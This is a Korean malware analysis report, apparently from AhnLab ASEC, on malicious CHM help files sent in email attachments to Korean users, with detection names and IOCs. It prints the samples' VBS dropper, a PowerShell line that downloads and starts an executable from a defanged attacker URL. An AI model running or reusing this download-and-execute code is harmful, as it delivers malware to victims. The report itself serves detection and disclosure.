윈도우 도움말 파일(*.chm)로 유포되는 APT 공격

ASEC 분석팀은 최근 윈도우 도움말 파일(*.chm) 형식의 악성코드가 국내 사용자를 대상으로 유포되고 있음을 확인하였다. chm 파일은 컴파일 된 HTML Help 파일로 microsoft® html help executable 프로그램을 통해 실행된다.

최근 확인된 chm 파일은 실행 시 추가 악성 파일을 다운로드하며 이 과정에서 정상적인 내용을 담은 창이 실행되어 사용자가 악성 파일 임을 인지하기 어려운 특징이 존재한다.

악성 코드는 아래와 같이 압축 파일 형태로 메일에 첨부되어 유포된다.

그림1. 유포 이메일

첨부된 압축 파일 내부에는 워드 문서와 rar 파일이 포함되어 있다. RAR 파일 내부에는 악성 파일인 Guide.chm이 존재한다.

그림2. 압축파일
그림3. 최신자료 (가이드).rar 에 존재하는 .chm 파일

워드 문서의 경우 암호가 설정되어 있어 문서의 내용을 알 수 없다. 함께 압축된 chm 파일 실행을 유도하는 것으로 추정된다.

그림4. 워드 문서

Guide.chm 파일 실행 시 다음과 같은 도움말 창이 생성된다. 해당 내용은 https://mage.github.io/mage/ 에서 확인되는 내용과 동일하다.

그림5. 생성되는 도움말 창

chm 파일 내부를 확인해보면 MAGE User Guide.html 파일 내에 특정 명령어가 존재한다. 해당 명령어는 shortcut.Click(); 함수를 통해 자동으로 실행된다.

그림6. MAGE User Guide.html 내부 코드

해당 명령어가 실행되면 %USERPROFILE%\Links\ 폴더에 Document.dat과 Document.vbs가 생성된다. Document.dat 에는 Base64로 인코딩 된 데이터가 존재하며 이를 디코딩한 데이터가 Document.vbs에 저장된다.

그림7. 생성된 스크립트 파일

이후 해당 VBS 파일이 지속적으로 실행될 수 있도록 HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Document 에 추가한다.

그림8. 생성된 레지스트리

Document.vbs 에는 아래와 같이 파워쉘을 이용하여 추가 파일을 다운로드하는 코드가 존재한다. 다운로드 된 파일은 %tmp% 폴더에 advupdate.exe 명으로 저장한 후 실행한다.

Dim sh
Set sh=WScript.CreateObject("WScript.Shell")
sh.run "cmd /c powershell iwr -outf %tmp%\advupdate.exe hxxps://encorpost[.]com/post/post.php?type=1 & start %tmp%\advupdate.exe",0,false
Set sh=Nothing

현재 해당 URL에서 다운로드 받아지는 파일은 정상 파일이지만 동일한 파일명을 가진 악성코드가 확인되어 사용자의 주의가 필요하다.

추가로 현재까지 확인된 동일한 유형의 악성코드는 다음과 같다.

압축파일명악성 chm 파일명
법원제출자료.zipasset.chm
계약서.zipcontract.chm
wages.zipwages.chm
document.zipNodejs for Game Server Development.chm
표1. 추가 확인된 악성 파일명

‘법원제출자료.zip’ 파일에는 앞서 설명한 악성 파일과 유사하게 내부에 문서 파일과 RAR 파일을 포함하고 있다.

그림9. 추가 확인된 악성 파일 1-1

해당 chm 파일 역시 정상적인 도움말 파일로 위장하고 있다. 엑셀 파일의 경우에도 암호가 설정되어 있지 않아 내부 내용을 확인할 수 있다.

그림10. 추가 확인된 악성 파일1-2 (좌:chm 파일 실행 화면 / 우:엑셀 문서 실행화면)

계약서.zip 파일명으로 유포된 압축 파일 내부에는 아래와 같이 2개의 문서 파일과 RAR 압축 파일이 존재한다. 워드 문서는 두 파일 모두 암호가 설정되어 있어 확인이 불가능하다. chm 파일의 경우 특정 내용을 포함하여 정상적인 도움말 파일로 위장하고 있다.

그림 11. 추가 확인된 악성 파일 2-1
그림 12. 추가 확인된 악성 파일 2-2 (워드 문서)
그림 13. 추가 확인된 악성 파일 2-3 (chm 파일)

추가로 확인된 .chm 파일들 또한 실행 시 %USERPROFILE%\Links\ 폴더에 스크립트 파일을 드롭 및 런키 등록을 수행한다. 이후 스크립트 파일 실행 시 추가 악성 파일을 다운로드하여 %tmp% 폴더에 advupdate.exe 파일명으로 저장 및 실행한다.

확인된 다운로드 URL은 다음과 같다.

파일명다운로드 URL
Nodejs for Game Server Development.chmhxxps://nhn-games[.]com/game03953/gamelist.php?type=1
wages.chmhxxps://sktelecom[.]help/download/select.php?type=1
User Guide.chmhxxps://sktelecom[.]help/download/select.php type=1
contract.chmhxxps://want-helper[.]com/database/db.php?type=1
asset.chmhxxps://want-helper[.]com/database/db.php?type=1
표2. 추가 다운로드 URL

최근 압축 형태로 유포되는 악성 윈도우 도움말 파일(*.chm)이 지속적으로 확인되고 있다. 압축 파일명이나 도움말 파일의 실행 화면으로 보아 국내 사용자를 타겟한 것으로 추정된다. 현재 다운로드 URL에서는 정상적인 실행파일이 다운로드 되고 있어 최종적으로 동작하는 악성코드의 기능은 정확하게 확인이 불가능하다. 다만, 공격자가 해당 URL에 다양한 악성코드를 업로드 할 가능성이 존재하기 때문에 각별한 주의가 필요하다.

현재 V3에서는 해당 악성코드들을 다음과 같이 진단하고 있다.

[파일 진단]
Trojan/CHM.Agent
Downloader/CHM.Agent

[IOC]
3ae6503e836b295955a828a76ce2efa7 (CHM)
d26481e376134dc14966ccab39b91f16 (CHM)
997165ed836b8a2a6af5cf2d43af5803 (CHM)
5f1091df4c74412ef59426c1bb65f4d0 (CHM)
ae43f4d4c6123294b2f3ede294032944 (CHM)
acc6263bd54de778c1e22373d73887ab (CHM)
hxxps://encorpost[.]com/post/post.php?type=1
hxxps://nhn-games[.]com/game03953/gamelist.php?type=1
hxxps://sktelecom[.]help/download/select.php?type=1
hxxps://want-helper[.]com/database/db.php?type=1

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:,

0 0 votes
별점 주기
guest
1 댓글
Inline Feedbacks
View all comments
trackback

[…] 지속적으로 유포되고 있음을 확인하였다. 최근 확인된 chm 파일은 <윈도우 도움말 파일(*.chm)로 유포되는 APT 공격>에서 소개한 파일과 동일한 유형으로 추가 악성코드 다운로드를 […]